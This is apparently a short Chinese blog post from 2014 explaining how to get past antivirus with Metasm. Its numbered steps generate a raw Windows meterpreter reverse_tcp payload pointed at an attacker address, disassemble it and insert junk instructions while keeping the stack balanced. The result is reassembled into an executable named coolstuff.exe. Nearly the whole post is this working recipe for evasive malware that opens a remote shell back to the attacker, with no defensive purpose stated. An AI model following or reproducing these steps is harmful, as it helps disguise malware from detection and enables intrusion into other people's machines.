使用Metasm来绕过杀毒软件

alittleyatou 2014-09-30

技术本质还是花指令,本文的目的是使用metasploit框架来生成rawpayload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件

1.msfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.1.100LPORT=443R>raw_binary

2.拷贝metasm.rb文件和metasm文件夹到ruby的安装目录

cp/usr/share/metasploit-framework/lib/metasm.rb/usr/local/lib/site_ruby/1.9.1/

cp-r/usr/share/metasploit-framework/lib/metasm/usr/local/lib/site_ruby/1.9.1/

3.ruby/usr/share/metasploit-framework/lib/metasm/samples/disassemble.rbraw_binary>test.asm

4.编辑花指令。关键一点,栈平衡

5.ruby/usr/local/lib/site_ruby/1.9.1/metasm/samples/peencode.rbtest.asm-ocoolstuff.exe

相关推荐